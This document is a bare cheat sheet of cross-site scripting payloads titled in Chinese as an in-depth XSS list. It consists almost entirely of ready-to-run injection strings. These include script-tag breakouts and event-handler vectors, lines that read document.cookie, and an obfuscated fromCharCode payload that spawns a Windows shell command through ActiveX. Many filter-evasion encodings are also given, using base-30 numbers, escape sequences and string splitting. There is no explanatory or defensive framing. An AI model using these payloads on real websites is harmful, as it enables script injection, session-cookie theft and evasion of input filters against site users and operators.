xss payload深入
xss payload
"><script>alert(1)</script>//
<img src=x onerror=alert(2)>
<svg /onload=alert`1`>
<embed src=//tiny.cc>
</textarea><script>alert(document.cookie)</script><textarea>
\"-confirm`1`//
</span><img src=x onerror=alert(1)><span>//
{{constructor.constructor('alert(6)')()}}
'javascript:eval:name'
unicode:
\\u003cscript\\u003ealert(document.cookie)\\u003cscript\\u003e
var o=new ActiveXObject("WScript.Shell")
o.run("calc.exe")
eval(String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,59,10,111,46,114,117,110,40,34,99,97,108,99,46,101,120,101,34,41,59))
<details open ontoggle=top[8680439..toString(30)](1);>
<details open ontoggle=top[11189117..toString(32)](1);>
<svg/onload=Set.constructor('al'%2b'ert(1)')()>
<q/oncut=open()>
<q/oncut=alert(1)>
<select autofocus onfocus=alert(1)>
<body onload=prompt(1)>
<aaaa id="c" onfocus=alert(1) tabindex=0>
<marquee/onstart=confirm(2)>
<svg>
<script>alert(/ 1/ ) </script>//
"src=# type=image onerror
="alert(1)
<img src=a onerror=top['alert'](2)>
al\u0065rt(1)
al%0aert(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top["al"+"ert"](1)
a=alert,a(1)
<img src=x onerror=[1].find(alert)>
转换30进制
(8680439).toString(30) alert
eval((8680439).toString(30) )(666)
<script>eval((8680439).toString(30) )(666)
</script>
